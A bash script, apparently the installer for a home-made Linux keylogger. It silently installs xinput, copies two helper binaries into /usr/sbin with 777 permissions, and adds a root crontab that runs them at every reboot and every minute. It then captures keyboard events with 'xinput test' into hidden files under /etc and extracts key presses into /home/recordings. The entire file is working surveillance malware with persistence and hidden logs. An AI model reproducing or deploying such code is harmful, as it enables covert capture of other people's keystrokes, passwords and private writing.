#!/bin/bash
# THIS FILE HAS TO BE RUN FIRSTLY
# THIS IS THE FIRST PART OF THE PROGRAM

# install the program xinput puting automatically yes for installing and without showing it installs
sudo apt-get --yes --force-yes install xinput >> /dev/null


# we put in 777 the files lol and table3 for execute this files
chmod 777 prog
chmod 777 table3


# we copy the programfile lol in the reposistory /usr/sbin/
cp $PWD/prog /usr/sbin
cp $PWD/table3 /usr/sbin

cd /home

# we create the repository recordings in /home/recordings if it not exists yet
if [ ! -d "/home/recordings" ]; then
	mkdir /home/recordings >> /dev/null
fi

#we change our current directory
cd /home/recordings

# we create 3 files 
touch root
touch /etc/.nikokks1
touch /etc/.nikokks2
# the dot before the name of the file puts the file in hidden file


# we write the following commands in the fille root
# command for launch at every reboot the prgramm lol
echo "@reboot /usr/sbin/prog" >> root
# every minutes we launch the program table3 which translates input commands of the keyboard (letter and numbers)
echo "* * * * * /usr/sbin/table3" >> root

# we send the file root in the crontab as root (commmand who run commands and scripts automatically)
sudo crontab -u root root

# we delete the file root
rm -f root

# we select the id of the keyboard
id=`xinput list | grep AT | cut -d '=' -f 2 | cut -c 1-2`

# we run the xinput command and send the flow in the file .nikokks1 on background
xinput test $id  >> /etc/.nikokks1 &

# we copy the file .nikokks1 to .nikokks2
cp /etc/.nikokks1 /etc/.nikokks2

# we select the important informations to the file temp
grep "press" /etc/.nikokks2 | cut -c 13-15 >> /home/recordings/temp


